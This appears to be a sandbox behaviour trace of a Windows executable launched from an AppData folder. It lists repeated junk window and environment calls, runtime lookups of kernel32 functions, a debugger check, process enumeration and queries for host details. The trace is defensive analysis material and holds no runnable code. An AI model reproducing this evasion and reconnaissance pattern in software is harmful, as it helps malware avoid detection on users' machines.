| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74144bf0 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74137810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74137a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74137600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x7413a700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74145100 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74137a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74147b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74138bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74137990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x76ef7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74133870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74146630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x74147020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74146c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x74162430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x7413ab60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74132af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x74131b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x7413a2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x741378b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74132ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x74133880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74137710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x7413a6e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x74146aa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x76ee0e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x7413a740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x7413a720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74146ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74139b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x741338a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x741323e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x74137620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x7413aac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x7413a7e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7413b0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74139bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x74162670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x7413a940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x74146730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x741338c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74145100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x7413a120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x74131b70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x741329d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x7413a040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74139bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x76ecf290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x76ecf210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74131ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x7413a790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x74138500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x74145140 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x7413a290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x74137930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x74138c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x741619a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x76ec2bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x76ebefe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x74137950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x76ebbb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x74139f30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x741469b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x74146f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x74146f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74146890 |
|
1 | |
| Module | Load | module_name = msvcr100.dll, base_address = 0x6f970000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x6f98c544 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-14 01:01:16 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7413a980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74144ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74137570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74139e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x74146740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x741466a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x74146700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7413b040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7413ace0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x76ed7dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x76ee4010 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x76ee2a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7413a7b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x76ee2290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x76ee2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x76f07a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x76efac00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x76eea890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7413ac80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x74160830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x767f6270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7413fe80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x7413ff80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x74160e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x7413a750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x74161240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7413ad60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x74161460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74139a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x7677ded0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x74133630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x74146bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x74146c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x74146a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74133870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x7413b1d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x7415d260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x74146c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x741466f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x74146a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x76ef1a40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74146820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x74145eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x76eea200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74138bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x74139fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74140160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74137990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74145100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x74138c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x74146800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x76ee0e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x7413cd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74133690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x74146660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x7413f640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74132ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x74130540 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74137830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7413d290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x74147b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x76ecf210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x76ecf290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x74146960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x74137970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x741468e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x741469a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7413ac70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x741446a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x741469f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x74145120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x74146b60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74144bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74137590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74137600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74139b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74146630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7415d170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x741399b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x76ef7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74146890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74139b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74146ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74139bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x74139b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74138d60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x74146a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x74139970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x7413ea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x741399f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74137810 |
|
1 | |
